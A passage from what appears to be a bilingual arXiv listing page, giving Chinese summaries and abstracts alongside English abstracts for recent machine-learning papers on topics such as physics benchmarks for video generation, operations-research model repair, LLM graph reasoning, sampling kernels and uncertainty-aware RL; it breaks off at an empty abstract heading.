视频生成模型在创建高质量、逼真内容方面取得了显著进展。然而,它们准确模拟物理现象的能力仍然是一个关键且未解决的挑战。本文提出了PhyWorldBench,一个全面的基准测试,旨在根据视频生成模型对物理定律的遵循程度进行评估。该基准涵盖了多个层次的物理现象,从基本物理原理如物体运动和能量守恒,到更复杂的场景如刚体相互作用以及人或动物的运动。此外,我们引入了一个新颖的反物理类别,其中提示故意违反现实世界的物理规律,从而评估模型在保持逻辑一致性的同时能否遵循此类指令。除了大规模人工评估外,我们还设计了一种简单而有效的方法,利用当前的多模态大语言模型以零样本方式评估物理真实性。我们评估了12个最先进的文本到视频生成模型,包括五个开源模型和五个专有模型,并进行了详细的比较和分析。通过对跨越基础、复合和反物理场景的1050个精心策划的提示进行系统测试,我们识别出这些模型在遵循现实世界物理规律方面面临的关键挑战。我们进一步研究了它们在不同物理现象和提示类型下的表现,并得出了针对性的建议,以构建增强物理原理保真度的提示。

英文摘要

Video generation models have achieved remarkable progress in creating high-quality, photorealistic content. However, their ability to accurately simulate physical phenomena remains a critical and unresolved challenge. This paper presents PhyWorldBench, a comprehensive benchmark designed to evaluate video generation models based on their adherence to the laws of physics. The benchmark covers multiple levels of physical phenomena, ranging from fundamental principles such as object motion and energy conservation to more complex scenarios involving rigid body interactions and human or animal motion. Additionally, we introduce a novel Anti-Physics category, where prompts intentionally violate real-world physics, enabling the assessment of whether models can follow such instructions while maintaining logical consistency. Besides large-scale human evaluation, we also design a simple yet effective method that utilizes current multimodal large language models to evaluate physics realism in a zero-shot fashion. We evaluate 12 state-of-the-art text-to-video generation models, including five open-source and five proprietary models, with detailed comparison and analysis. Through systematic testing across 1050 curated prompts spanning fundamental, composite, and anti-physics scenarios, we identify pivotal challenges these models face in adhering to real-world physics. We further examine their performance under diverse physical phenomena and prompt types, and derive targeted recommendations for crafting prompts that enhance fidelity to physical principles.

2601.21008 2026-05-27 cs.LG cs.AI math.OC 版本更新

ORLoopBench: Solver-in-the-Loop Benchmarks for Self-Correction and Behavioral Rationality in Operations Research

ORLoopBench:运筹学中自我修正与行为理性的求解器在环基准测试

Ruicheng Ao, David Simchi-Levi, Xinshang Wang

AI总结 提出ORLoopBench基准套件,通过将不可行模型修复形式化为求解器在环马尔可夫决策过程,利用不可约不可行子系统(IIS)反馈,结合验证强化学习训练(RLVR),使8B模型在LP修复上超越前沿API(95.3% vs 92.4% RR@5),并揭示全模型代码再生中的语义漂移问题。

Comments 58 pages, accepted by ICML 2026

详情
AI中文摘要

运筹学从业者通过迭代过程调试不可行模型:检查不可约不可行子系统(IIS),识别约束冲突,并修复公式直至恢复可行性。现有的LLM基准大多将OR视为从问题描述到求解器代码的一次性翻译,忽略了这一诊断循环。我们将不可行模型修复形式化为一个求解器在环马尔可夫决策过程,其中每个动作触发求解器重新执行和IIS重新计算,产生确定性的、可验证的反馈。我们引入ORLoopBench,一个包含两个组件的基准套件:OR-Debug-Bench发布5,362个LP/MILP修复实例,而OR-Bias-Bench评估库存设置中的闭式运营决策理性。求解器验证的RLVR训练使8B模型在LP修复上超越前沿API(95.3% vs 92.4% RR@5),改善诊断行为,并迁移到MILP修复。同样的评估暴露了全模型代码再生中的语义漂移:可行的再生MILP可能解决错误的问题。使用求解器预言机的过程级评估能够为可靠的OR自我修正进行针对性训练。

英文摘要

Operations Research practitioners debug infeasible models through an iterative process: inspecting Irreducible Infeasible Subsystems ( IIS), identifying constraint conflicts, and repairing formulations until feasibility is restored. Existing LLM benchmarks mostly treat OR as one-shot translation from problem descriptions to solver code, omitting this diagnostic loop. We formalize infeasible-model repair as a solver-in-the-loop Markov Decision Process in which each action triggers solver re-execution and IIS recomputation, yielding deterministic, verifiable feedback. We introduce ORLoopBench, a benchmark suite with two components: OR-Debug-Bench releases 5,362 LP/MILP repair instances, while OR-Bias-Bench evaluates closed-form operational decision rationality across inventory settings. Solver-verified RLVR training enables an 8B model to surpass frontier APIs on LP repair (95.3% vs 92.4% RR @5), improves diagnostic behavior, and transfers to MILP repair. The same evaluation exposes semantic drift in whole-model code regeneration: feasible regenerated MILPs can solve the wrong problem. Process-level evaluation with solver oracles enables targeted training for reliable OR self-correction.

2501.06708 2026-05-27 cs.LG cs.AI 版本更新

Evaluating Sample Utility for Efficient Data Selection by Mimicking Model Weights

通过模仿模型权重评估样本效用以实现高效数据选择

Tzu-Heng Huang, Manjot Bilkhu, John Cooper, Frederic Sala, Javier Movellan

发表机构 * Apple(苹果公司)

AI总结 提出基于梯度和几何的Mimic Score指标,通过Grad-Mimic框架在线重加权样本加速训练、离线构建数据过滤器,在六个图像数据集上提升数据效率和CLIP模型性能。

Comments This work appears in the Proceedings of the 43rd International Conference on Machine Learning (ICML 2026) and was selected as an Oral paper at the ICML 2025 DataWorld Workshop

详情
AI中文摘要

大规模网络爬取数据集包含噪声、偏差和不相关信息,因此需要数据选择技术。现有方法依赖于手工启发式、下游数据集或需要昂贵的基于影响力的计算——所有这些都限制了可扩展性并引入了不必要的数据依赖性。为了解决这个问题,我们引入了Mimic Score,一种简单且基于几何的数据质量指标,通过测量样本梯度与预训练参考模型诱导的目标方向之间的对齐来评估效用。这利用了现成的模型权重,避免了验证数据集的需求,并且计算开销最小。基于该指标,我们提出了Grad-Mimic,一个两阶段框架,在线重新加权样本以加速训练,并离线聚合样本效用以构建有效的数据过滤器。实验表明,使用模仿分数指导训练提高了数据效率,加速了收敛,在六个图像数据集上取得了一致的性能提升,并以减少20.7%的训练步骤增强了CLIP模型。此外,基于模仿分数的过滤器增强了现有过滤技术,使得用更少470万个样本训练的CLIP模型得到改进。

英文摘要

Large-scale web-crawled datasets contain noise, bias, and irrelevant information, necessitating data selection techniques. Existing methods depend on hand-crafted heuristics, downstream datasets, or require expensive influence-based computations -- all of which limit scalability and introduce unwanted data dependencies. To address this, we introduce the Mimic Score, a simple and geometry-based data-quality metric that evaluates utility by measuring alignment between a sample's gradients and a target direction induced by a pre-trained reference model. This leverages readily available model weights, avoids needing validation datasets, and incurs minimal computational overheads. Building on this metric, we propose Grad-Mimic, a two-stage framework that re-weights samples online to accelerate training and aggregates sample utilities offline to construct effective data filters. Empirically, we show that using mimic scores to guide training improves data efficiency, accelerates convergence, yields consistent performance gains across six image datasets, and enhances CLIP models with 20.7% fewer training steps. Additionally, mimic score-based filters augment existing filtering techniques, enabling improved CLIP models trained with 4.7 million fewer samples.

2602.04931 2026-05-27 cs.LG cs.AI 版本更新

Emergent Causal-Geometric Dynamics Across Depth in Large Language Models

大型语言模型中跨深度的涌现因果几何动力学

Shahar Haim, Daniel C McNamee

发表机构 * Champalimaud Centre for the Unknown(查普拉米乌德未知中心)

AI总结 通过结合几何分析与因果干预,揭示了解码器-only大型语言模型中从上下文处理到预测形成的跨层转变,并发现后期层中角度结构参数化下一词分布相似性并实现选择性因果控制。

详情
AI中文摘要

对大型语言模型(LLM)表征的几何分析揭示了跨深度的结构化变化,但本质上与token预测形成相关。同时,因果干预揭示了依赖于深度的效能曲线,但缺乏对其表征动力学的统一解释。对LLM功能的完整解释需要说明表征结构如何跨深度演化以因果性地产生预测。我们通过将几何分析与机械干预相结合,明确将跨深度动力学作为解释LLM功能的组织轴,综合了这些视角。在解码器-only LLM中,我们识别出从上下文处理到预测形成计算的急剧转变,伴随着跨层的表征几何的更渐进重组。这种综合揭示了一种后期层几何编码,其中角度结构参数化下一词分布相似性,并能够对预测进行选择性因果控制,而表征范数编码的信息与预测基本解耦。总之,我们的结果提供了因果和几何视角的综合,产生了关于语言模型中跨深度的控制相关几何动力学如何将上下文转化为预测的机械论解释。这一视角调和了先前令人困惑的发现,并表明层状功能不能孤立地理解或有效干预,而只能在网络涌现的全局动力学结构中理解。

英文摘要

Geometric analyses of large language model (LLM) representations reveal structured variation across depth but remain fundamentally correlational with respect to token prediction formation. Meanwhile, causal interventions expose depth-dependent efficacy profiles without a unifying account of their representational dynamics. A complete account of LLM function requires explaining how representational structure evolves across depth to causally produce predictions. We synthesize these perspectives by combining geometric analysis with mechanistic interventions, explicitly centralizing depth-wise dynamics as the organizing axis for interpreting LLM function. In decoder-only LLMs, we identify a sharp transition from context-processing to prediction-forming computation, accompanied by a more gradual reorganization of representational geometry across layers. This synthesis reveals a late-layer geometric code in which angular structure parameterizes next-token distributional similarity and enables selective causal control over predictions, while representation norms encode information largely decoupled from prediction. Together, our results provide a synthesis of causal and geometric perspectives, yielding a mechanistic account of how control-relevant geometric dynamics across depth transform context into prediction in language models. This perspective reconciles previously puzzling findings and implies that layer-wise function cannot be understood or effectively intervened upon in isolation, but only within the emergent global dynamical structure of the network.

2602.03545 2026-05-27 cs.AI 版本更新

Persona Generators: Generating Diverse Synthetic Personas for Arbitrary Contexts

人格生成器:为任意上下文生成多样化的合成人格

Davide Paglieri, Logan Cross, William A. Cunningham, Joel Z. Leibo, Alexander Sasha Vezhnevets

发表机构 * Google DeepMind(谷歌深Mind)

AI总结 提出Persona Generators,通过迭代进化优化生成覆盖广泛意见和偏好的多样化合成人格,在六个多样性指标上显著优于现有基线。

详情
AI中文摘要

评估与人类交互的AI系统需要理解它们在不同用户群体中的行为,但收集代表性人类数据通常成本高昂或不可行,特别是对于新技术或假设的未来场景。最近在生成式基于智能体建模方面的工作表明,大型语言模型可以高保真地模拟类似人类的合成人格,准确再现特定个体的信念和行为。然而,大多数方法需要关于目标群体的详细数据,并且通常优先考虑密度匹配(复制最可能的内容)而非支持覆盖(覆盖可能的内容),导致长尾行为未被充分探索。我们引入了Persona Generators,即能够为任意上下文生成多样化合成群体的函数。我们应用基于AlphaEvolve的迭代改进循环,使用大型语言模型作为变异算子,在数百次迭代中优化我们的Persona Generator代码。优化过程产生了轻量级的Persona Generators,能够自动将小规模描述扩展为多样化的合成人格群体,这些群体在相关多样性轴上最大化意见和偏好的覆盖。我们证明,进化后的生成器在保留上下文上的六个多样性指标上显著优于现有基线,产生了覆盖标准LLM输出中难以实现的罕见特征组合的群体。

英文摘要

Evaluating AI systems that interact with humans requires understanding their behavior across diverse user populations, but collecting representative human data is often expensive or infeasible, particularly for novel technologies or hypothetical future scenarios. Recent work in Generative Agent-Based Modeling has shown that large language models can simulate human-like synthetic personas with high fidelity, accurately reproducing the beliefs and behaviors of specific individuals. However, most approaches require detailed data about target populations and often prioritize density matching (replicating what is most probable) rather than support coverage (spanning what is possible), leaving long-tail behaviors underexplored. We introduce Persona Generators, functions that can produce diverse synthetic populations tailored to arbitrary contexts. We apply an iterative improvement loop based on AlphaEvolve, using large language models as mutation operators to refine our Persona Generator code over hundreds of iterations. The optimization process produces lightweight Persona Generators that can automatically expand small descriptions into populations of diverse synthetic personas that maximize coverage of opinions and preferences along relevant diversity axes. We demonstrate that evolved generators substantially outperform existing baselines across six diversity metrics on held-out contexts, producing populations that span rare trait combinations difficult to achieve in standard LLM outputs.

2602.03238 2026-05-27 cs.AI 版本更新

The Necessity of a Unified Framework for LLM-Based Agent Evaluation

基于LLM的智能体评估统一框架的必要性

Pengyu Zhu, Li Sun, Philip S. Yu, Sen Su

发表机构 * Beijing University of Posts and Telecommunications(北京邮电大学) University of Illinois Chicago(伊利诺伊大学芝加哥分校) Chongqing University of Posts and Telecommunications(重庆邮电大学)

AI总结 针对当前LLM智能体评估受系统提示、工具集和环境动态等混杂因素影响的问题,提出标准化统一评估框架以提升公平性和可复现性。

详情
AI中文摘要

随着大型语言模型(LLM)的出现,通用智能体取得了根本性进展。然而,评估这些智能体带来了独特的挑战,使其区别于静态的问答基准。我们观察到,当前的智能体基准受到系统提示、工具集配置和环境动态等外部因素的严重混淆。现有评估通常依赖于碎片化的、研究者特定的框架,其中推理和工具使用的提示工程差异很大,使得难以将性能提升归因于模型本身。此外,缺乏标准化的环境数据导致不可追踪的错误和不可重复的结果。这种标准化的缺失给该领域带来了显著的不公平性和不透明性。我们提出,一个统一的评估框架对于智能体评估的严谨进展至关重要。为此,我们提出了一项旨在标准化智能体评估的建议。

英文摘要

With the advent of Large Language Models (LLMs), general-purpose agents have seen fundamental advancements. However, evaluating these agents presents unique challenges that distinguish them from static QA benchmarks. We observe that current agent benchmarks are heavily confounded by extraneous factors, including system prompts, toolset configurations, and environmental dynamics. Existing evaluations often rely on fragmented, researcher-specific frameworks where the prompt engineering for reasoning and tool usage varies significantly, making it difficult to attribute performance gains to the model itself. Additionally, the lack of standardized environmental data leads to untraceable errors and non-reproducible results. This lack of standardization introduces substantial unfairness and opacity into the field. We propose that a unified evaluation framework is essential for the rigorous advancement of agent evaluation. To this end, we introduce a proposal aimed at standardizing agent evaluation.

2602.02518 2026-05-27 cs.LG cs.AI cs.CL 版本更新

GraphDancer: Training LLMs to Explore and Reason over Graphs via Two-Stage Curriculum Post-Training

GraphDancer: 通过两阶段课程后训练训练LLMs在图上的探索与推理

Yuyang Bai, Zhuofeng Li, Ping Nie, Jianwen Xie, Yu Zhang

发表机构 * Texas A&M University(德克萨斯大学A&M分校) University of Waterloo(滑铁卢大学) Lambda(Lambda公司) University of Oregon(俄勒冈大学)

AI总结 提出GraphDancer两阶段后训练框架,通过图感知课程逐步增加任务难度,使LLMs学会在异构图上进行自然语言推理与函数调用交织的探索与推理,仅用3B骨干模型即在跨域基准上超越更强基线。

Comments 15 pages, Project website: https://yuyangbai.com/graphdancer/

详情
AI中文摘要

大型语言模型(LLMs)越来越依赖外部知识来提高事实性,然而许多真实世界的知识源被组织为异构图而非纯文本。在此类图上进行推理要求模型通过精确的函数调用遵循模式定义的关系,并在多轮交互中聚合证据。我们提出GraphDancer,一个两阶段后训练框架,通过将自然语言推理与图函数执行交织来教导LLMs在图上的推理。第一阶段教导模型在基于规则的奖励下如何与图交互,而第二阶段进一步教导其偏好更基于事实且高效的交互轨迹。GraphDancer的关键创新在于一个图感知课程,该课程根据信息寻求轨迹的结构复杂性组织两个阶段,在训练期间逐步增加任务难度。我们在一个多领域基准上评估GraphDancer,仅在一个领域上训练,并在未见过的领域和分布外问题类型上进行测试。尽管仅使用3B骨干模型,GraphDancer仍优于配备更大/更强骨干的基线,展示了图探索和推理技能的强大跨域泛化能力。我们的代码可在https://github.com/leopoldwhite/GraphDancer找到。

英文摘要

Large language models (LLMs) increasingly rely on external knowledge to improve factuality, yet many real-world knowledge sources are organized as heterogeneous graphs rather than plain text. Reasoning over such graphs requires models to follow schema-defined relations through precise function calls and to aggregate evidence across multiple rounds of interaction. We propose GraphDancer, a two-stage post-training framework that teaches LLMs to reason over graphs by interleaving natural-language reasoning with graph function execution. The first stage teaches the model how to interact with the graph under rule-based rewards, while the second stage further teaches it to prefer more grounded and efficient interaction trajectories. The key novelty of GraphDancer is a graph-aware curriculum that organizes both stages by the structural complexity of information-seeking trajectories, progressively increasing task difficulty during training. We evaluate GraphDancer on a multi-domain benchmark by training on one domain only and testing on unseen domains and out-of-distribution question types. Despite using only a 3B backbone, GraphDancer outperforms baselines equipped with larger/stronger backbones, demonstrating robust cross-domain generalization of graph exploration and reasoning skills. Our code can be found at https://github.com/leopoldwhite/GraphDancer.

2602.01518 2026-05-27 cs.AI 版本更新

Qrita: High-performance Top-k and Top-p using Pivot-based Truncation and Selection

Qrita:使用基于枢轴的截断和选择的高性能Top-k和Top-p

Jongseok Park, Sunga Kim, Alvin Cheung, Ion Stoica

发表机构 * University of California, Berkeley(加州大学伯克利分校)

AI总结 提出Qrita算法,通过基于高斯sigma截断和四元枢轴搜索的枢轴方法,高效实现Top-k和Top-p采样,在保持与排序算法相同输出的同时,将端到端服务吞吐量提升至1.4倍并减少一半内存使用。

详情
AI中文摘要

尽管Top-k和Top-p算法在模型采样中很重要,但对于大词汇表的高效实现仍然是一个重大挑战。现有方法通常依赖于排序,这在GPU上会带来显著的计算和内存开销,或者依赖于改变算法输出的随机方法。在这项工作中,我们提出了Qrita,一种基于枢轴截断和选择的高效Top-k和Top-p算法。Qrita利用基于枢轴的搜索来实现Top-k和Top-p,并采用两种关键技术:1. 基于高斯的sigma截断,大大减少了词汇表的搜索空间;2. 具有重复处理能力的四元枢轴搜索,将枢轴搜索迭代次数减半并保证确定性输出。我们使用Triton实现了Qrita,并针对高性能LLM执行引擎(如SGLang和FlashInfer)的Top-k和Top-p内核评估了其性能,将端到端服务吞吐量提高了1.4倍,同时内存使用量减半,并提供了与基于排序算法相同的输出。Qrita现在是vLLM GPU执行路径的默认Top-k和Top-p采样器,Qrita的三元实现可在https://github.com/vllm-project/vllm/blob/main/vllm/v1/sample/ops/topk_topp_triton.py获取。

英文摘要

Despite their importance in model sampling, efficient implementation of Top-k and Top-p algorithms for large vocabularies remains a significant challenge. Existing approaches often rely on sorting, which incurs significant computation and memory overhead on GPUs, or on stochastic approaches that alter the algorithm's output. In this work, we propose Qrita, an efficient Top-k and Top-p algorithm based on a pivot-based truncation and selection. Qrita leverages pivot-based search for both Top-k and Top-p with two key techniques: 1. Gaussian-based sigma-truncation, which greatly reduces the search space of the vocabulary, and 2. Quaternary pivot search with duplication handling, which halves the number of pivot search iterations and guarantees deterministic output. We implement Qrita using Triton and evaluate its performance against the Top-k and Top-p kernels of high-performance LLM execution engines such as SGLang and FlashInfer, improving end-to-end serving throughput up to 1.4 times with half the memory usage, while providing the same output as the sorting-based algorithms. Qrita is now the default Top-k and Top-p sampler for the GPU execution path of vLLM, and a ternary implementation of Qrita is available at https://github.com/vllm-project/vllm/blob/main/vllm/v1/sample/ops/topk_topp_triton.py.

2601.22648 2026-05-27 cs.AI cs.LG 版本更新

UCPO: Uncertainty-Aware Policy Optimization

UCPO:不确定性感知策略优化

Xianzhou Zeng, Jing Huang, Chunmei Xie, Gongrui Nan, Siye Chen, Mengyu Lu, Weiqi Xiong, Qixuan Zhou, Junhao Zhang, Qiang Zhu, Yadong Li, Xingzhong Xu

AI总结 针对现有强化学习范式在不确定性奖励下存在的优势偏差和过度自信问题,提出三元优势解耦和动态不确定性奖励调整机制,显著提升模型在知识边界外的可靠性。

Comments Accepted by ICML 2026

详情
AI中文摘要

构建可信赖的大语言模型的关键在于赋予其内在的不确定性表达能力,从而减轻高风险应用中的过度自信错误。然而,现有的强化学习范式(如GRPO)由于二元决策空间和静态不确定性奖励,常常遭受优势偏差,导致过度保守或过度自信。为了解决这一挑战,本文揭示了当前结合不确定性奖励的强化学习范式中奖励破解和过度自信的根本原因,并在此基础上提出了不确定性感知策略优化(UCPO)框架。UCPO采用三元优势解耦来分离并独立归一化确定性和不确定性轨迹,从而消除优势偏差。此外,动态不确定性奖励调整机制根据模型演化和实例难度实时调整不确定性权重。在数学推理和通用任务上的实验结果表明,UCPO有效解决了奖励不平衡问题,显著提高了模型在知识边界外的可靠性。

英文摘要

The key to building trustworthy large language models (LLMs) lies in endowing them with inherent uncertainty expression capabilities, thereby mitigating overconfident errors in high-stakes applications. However, existing RL paradigms such as GRPO often suffer from Advantage Bias due to binary decision spaces and static uncertainty rewards, inducing either excessive conservatism or overconfidence. To tackle this challenge, this paper unveils the root causes of reward hacking and overconfidence in current RL paradigms incorporating uncertainty-based rewards, based on which we propose the UnCertainty-Aware Policy Optimization (UCPO) framework. UCPO employs Ternary Advantage Decoupling to separate and independently normalize deterministic and uncertain rollouts, thereby eliminating advantage bias. Furthermore, a Dynamic Uncertainty Reward Adjustment mechanism adapts uncertainty weights in real-time according to model evolution and instance difficulty. Experimental results in mathematical reasoning and general tasks demonstrate that UCPO effectively resolves the reward imbalance, significantly improving the reliability of the model beyond their knowledge boundaries.

2601.22476 2026-05-27 cs.AR cs.AI 版本更新

RulePlanner: All-in-One Reinforcement Learner for Unifying Design Rules in 3D Floorplanning

RulePlanner: 用于统一3D布局规划中设计规则的全能强化学习器

Ruizhe Zhong, Xingbo Du, Junchi Yan

发表机构 * Shanghai Jiao Tong University(上海交通大学) Mohamed bin Zayed University of Artificial Intelligence(穆罕默德·本·扎耶德人工智能大学)

AI总结 提出一种基于深度强化学习的统一框架,通过新颖的矩阵表示、动作空间约束和奖励信号定量分析,处理多种硬件设计规则,实现3D布局规划中的规则遵守。

Comments ICML 2026

详情
AI中文摘要

布局规划决定了集成电路中每个模块的坐标和形状。随着技术节点的缩放,在布局规划阶段,特别是具有多个堆叠层的3D场景中,遵守复杂的硬件设计规则变得越来越具有挑战性。当前方法只能处理特定且有限的设计规则,而其他规则的违反需要手动和细致的调整。这导致专家工程师需要劳动密集且耗时的后处理。在本文中,我们提出了一种基于深度强化学习的全能方法来解决这些挑战,并为先前方法未解决的现实IC设计规则设计了新颖的表示。具体来说,各种硬件设计规则的处理被统一到一个具有三个关键组件的单一框架中:1)用于建模设计规则的新颖矩阵表示,2)对动作空间的约束以过滤掉导致规则违反的无效动作,以及3)约束满足的定量分析作为奖励信号。在公共基准上的实验证明了我们方法的有效性和正确性。此外,在未见过的电路上很好地展示了可迁移性。我们的框架可扩展以容纳新的设计规则,从而为应对未来芯片设计中的新兴挑战提供灵活性。代码将在以下网址提供:https://github.com/Thinklab-SJTU/EDA-AI

英文摘要

Floorplanning determines the coordinate and shape of each module in Integrated Circuits. With the scaling of technology nodes, in floorplanning stage especially 3D scenarios with multiple stacked layers, it has become increasingly challenging to adhere to complex hardware design rules. Current methods are only capable of handling specific and limited design rules, while violations of other rules require manual and meticulous adjustment. This leads to labor-intensive and time-consuming post-processing for expert engineers. In this paper, we propose an all-in-one deep reinforcement learning-based approach to tackle these challenges, and design novel representations for real-world IC design rules that have not been addressed by previous approaches. Specifically, the processing of various hardware design rules is unified into a single framework with three key components: 1) novel matrix representations to model the design rules, 2) constraints on the action space to filter out invalid actions that cause rule violations, and 3) quantitative analysis of constraint satisfaction as reward signals. Experiments on public benchmarks demonstrate the effectiveness and validity of our approach. Furthermore, transferability is well demonstrated on unseen circuits. Our framework is extensible to accommodate new design rules, thus providing flexibility to address emerging challenges in future chip design. Code will be available at: https://github.com/Thinklab-SJTU/EDA-AI

2601.22384 2026-05-27 cs.LG cs.AI 版本更新

Graph is a Substrate Across Data Modalities

图是跨数据模态的基板

Ziming Li, Xiaoming Wu, Zehong Wang, Jiazheng Li, Yijun Tian, Jinhe Bi, Yunpu Ma, Yanfang Ye, Chuxu Zhang

发表机构 * University of Connecticut(康涅狄格大学) University of Notre Dame(诺丁汉大学) National University of Singapore(新加坡国立大学)

AI总结 提出G-Substrate框架,通过统一结构模式和交错角色训练策略,使图结构作为共享基板跨模态和任务积累,优于孤立和朴素多任务方法。

Comments Graph structure across data modalities, accepted by ICML26

详情
AI中文摘要

图提供了跨不同领域出现的自然关系结构表示。尽管无处不在,图结构通常以模态和任务隔离的方式学习,即在单个任务上下文中构建图表示,然后丢弃。因此,跨模态和任务的结构规律被反复重建,而不是在中间图表示级别积累。这引发了一个表示学习问题:如何组织图结构,使其能够跨异构模态和任务持久存在并积累?我们采用以表示为中心的视角,将图结构视为跨学习上下文持久存在的结构基板。为了实例化这一视角,我们提出了G-Substrate,一个围绕共享图结构组织学习的图基板框架。G-Substrate包含两个互补机制:一个统一的结构模式,确保跨异构模态和任务的图表示兼容性;以及一个交错基于角色的训练策略,在学习过程中将同一图结构暴露给多个功能角色。跨多个领域、模态和任务的实验表明,G-Substrate优于任务隔离和朴素多任务学习方法。代码库、模型和数据集可在https://github.com/zmli6/G-Substrate获取。

英文摘要

Graphs provide a natural representation of relational structure that arises across diverse domains. Despite this ubiquity, graph structure is typically learned in a modality- and task-isolated manner, where graph representations are constructed within individual task contexts and discarded thereafter. As a result, structural regularities across modalities and tasks are repeatedly reconstructed rather than accumulated at the level of intermediate graph representations. This motivates a representation-learning question: how should graph structure be organized so that it can persist and accumulate across heterogeneous modalities and tasks? We adopt a representation-centric perspective in which graph structure is treated as a structural substrate that persists across learning contexts. To instantiate this perspective, we propose G-Substrate, a graph substrate framework that organizes learning around shared graph structures. G-Substrate comprises two complementary mechanisms: a unified structural schema that ensures compatibility among graph representations across heterogeneous modalities and tasks, and an interleaved role-based training strategy that exposes the same graph structure to multiple functional roles during learning. Experiments across multiple domains, modalities, and tasks show that G-Substrate outperforms task-isolated and naive multi-task learning methods. The codebase, model, and datasets are available at https://github.com/zmli6/G-Substrate.

2601.21789 2026-05-27 cs.LG cs.AI stat.ML 版本更新

ECSEL: Explainable Classification via Signomial Equation Learning

ECSEL: 通过符号方程学习的可解释分类

Adia Lumadjeng, Ilker Birbil, Erman Acar

发表机构 * Amsterdam Business School, University of Amsterdam, Amsterdam, the Netherlands(阿姆斯特丹大学阿姆斯特丹商学院) Institute for Informatics, University of Amsterdam(阿姆斯特丹大学信息学院) Institute for Logic, Language and Computation, University of Amsterdam(阿姆斯特丹大学逻辑、语言与计算研究所)

AI总结 提出ECSEL方法,通过学习符号方程形式的闭式表达式实现可解释分类,在符号回归基准上以更低计算量恢复更多目标方程,并保持分类精度与可解释性。

Comments 9 pages, 4 figures, accepted at ICML 2026

详情
AI中文摘要

我们引入ECSEL,一种可解释的分类方法,它学习形如符号方程的正式表达式,其动机是观察到许多符号回归基准具有紧凑的符号结构。ECSEL直接构建一个结构化的闭式表达式,同时作为分类器和解释。在标准符号回归基准上,我们的方法比竞争的最新方法恢复更大比例的目标方程,同时需要更少的计算。利用这种效率,ECSEL在不牺牲可解释性的情况下实现了与已建立的机器学习模型竞争的分类精度。此外,我们展示了ECSEL在全局特征行为、决策边界分析和局部特征归因方面满足一些理想性质。在基准数据集和两个真实世界案例研究(即电子商务和欺诈检测)上的实验表明,学习到的方程暴露了数据集偏差,支持反事实推理,并产生可操作的见解。

英文摘要

We introduce ECSEL, an explainable classification method that learns formal expressions in the form of signomial equations, motivated by the observation that many symbolic regression benchmarks admit compact signomial structure. ECSEL directly constructs a structural, closed-form expression that serves as both a classifier and an explanation. On standard symbolic regression benchmarks, our method recovers a larger fraction of target equations than competing state-of-the-art approaches while requiring substantially less computation. Leveraging this efficiency, ECSEL achieves classification accuracy competitive with established machine learning models without sacrificing interpretability. Further, we show that ECSEL satisfies some desirable properties regarding global feature behavior, decision-boundary analysis, and local feature attributions. Experiments on benchmark datasets and two real-world case studies i.e., e-commerce and fraud detection, demonstrate that the learned equations expose dataset biases, support counterfactual reasoning, and yield actionable insights.

2601.21576 2026-05-27 cs.AI 版本更新

Chain Of Thought Compression: A Theoretical Analysis

思维链压缩:理论分析

Juncai Li, Ru Li, Yuxiang Zhou, Boxiang Ma, Jeff Z. Pan

发表机构 * School of Computer and Information Technology, Shanxi University, Taiyuan, Shanxi, China(山西大学计算机与信息学院) Queen Mary, University of London, UK(伦敦大学女王学院) School of Informatics, University of Edinburgh, UK(爱丁堡大学信息学院)

AI总结 本文通过引入Order-r Interaction理论,证明了隐式思维链压缩中高阶逻辑依赖的学习信号指数衰减问题,并提出ALiCoT框架通过对齐潜在令牌分布与中间推理状态来克服信号衰减,实现54.4倍加速且性能与显式CoT相当。

详情
AI中文摘要

思维链(CoT)通过中间步骤解锁了大语言模型(LLMs)的高级推理能力,但由于生成额外令牌而带来了高昂的计算成本。最近的研究经验表明,将推理步骤压缩到潜在状态中,即隐式CoT压缩,提供了一种令牌高效的替代方案。然而,CoT压缩背后的机制仍不清楚。在本文中,我们首次对学习内化中间推理步骤的难度进行了理论分析。通过引入Order-r Interaction,我们证明了高阶逻辑依赖的学习信号指数衰减以解决不可约问题,其中跳过中间步骤不可避免地导致高阶交互障碍。为了经验验证这一点,我们引入了NatBool-DAG,这是一个具有挑战性的基准测试,旨在强制执行不可约逻辑推理并消除语义捷径。在我们的理论发现指导下,我们提出了ALiCoT(对齐隐式CoT),一种新颖的框架,通过对齐潜在令牌分布与中间推理状态来克服信号衰减。实验结果表明,ALiCoT成功解锁了高效推理:它实现了54.4倍加速,同时保持与显式CoT相当的性能。

英文摘要

Chain-of-Thought (CoT) has unlocked advanced reasoning abilities of Large Language Models (LLMs) with intermediate steps, yet incurs prohibitive computational costs due to generation of extra tokens. Recent studies empirically show that compressing reasoning steps into latent states, or implicit CoT compression, offers a token-efficient alternative. However, the mechanism behind CoT compression remains unclear. In this paper, we provide the first theoretical analysis of the difficulty of learning to internalize intermediate reasoning steps. By introducing Order-r Interaction, we prove that the learning signal for high-order logical dependencies exponentially decays to solve irreducible problem, where skipping intermediate steps inevitably leads to high-order interaction barriers. To empirically validate this, we introduce NatBool-DAG, a challenging benchmark designed to enforce irreducible logical reasoning and eliminate semantic shortcuts. Guided by our theoretical findings, we propose ALiCoT (Aligned Implicit CoT), a novel framework that overcomes the signal decay by aligning latent token distributions with intermediate reasoning states. Experimental results demonstrate that ALiCoT successfully unlocks efficient reasoning: it achieves a 54.4x speedup while maintaining performance comparable to explicit CoT.

2601.18904 2026-05-27 cs.SD cs.AI cs.CL 版本更新

MetaSICL: Adapting Audiroty LLM via Meta Speech In-Context Learning

MetaSICL: 通过元语音上下文学习适应听觉大语言模型

Haolong Zheng, Siyin Wang, Zengrui Jin, Mark Hasegawa-Johnson

发表机构 * University of Illinois Urbana Champaign(伊利诺伊大学厄巴纳-香槟分校) Tsinghua University(清华大学)

AI总结 提出MetaSICL方法,利用高资源语音数据通过元学习增强听觉大语言模型的上下文学习能力,在低资源场景下优于直接微调。

详情
AI中文摘要

听觉大语言模型在广泛的语音和音频理解任务中表现出强大的性能。然而,当应用于低资源任务时,它们常常遇到困难。如果域内标注数据稀缺或与真实测试分布不匹配,直接微调可能不稳定。上下文学习通过基于少量域内示例的条件化来适应听觉大语言模型,提供了一种无需训练、推理时的解决方案。在这项工作中,我们首先表明,$ extit{Vanilla ICL}$ 在选定的模型上提高了跨多种语音和音频任务的零样本性能,这表明这种ICL适应能力可以推广到多模态设置。在此基础上,我们提出了$ extbf{Meta Speech In-Context Learning (MetaSICL)}$,这是一种后训练方法,仅利用来自各种任务的高资源语音数据,旨在增强模型的上下文学习能力。实验表明,我们提出的方法在低资源场景下优于直接微调。

英文摘要

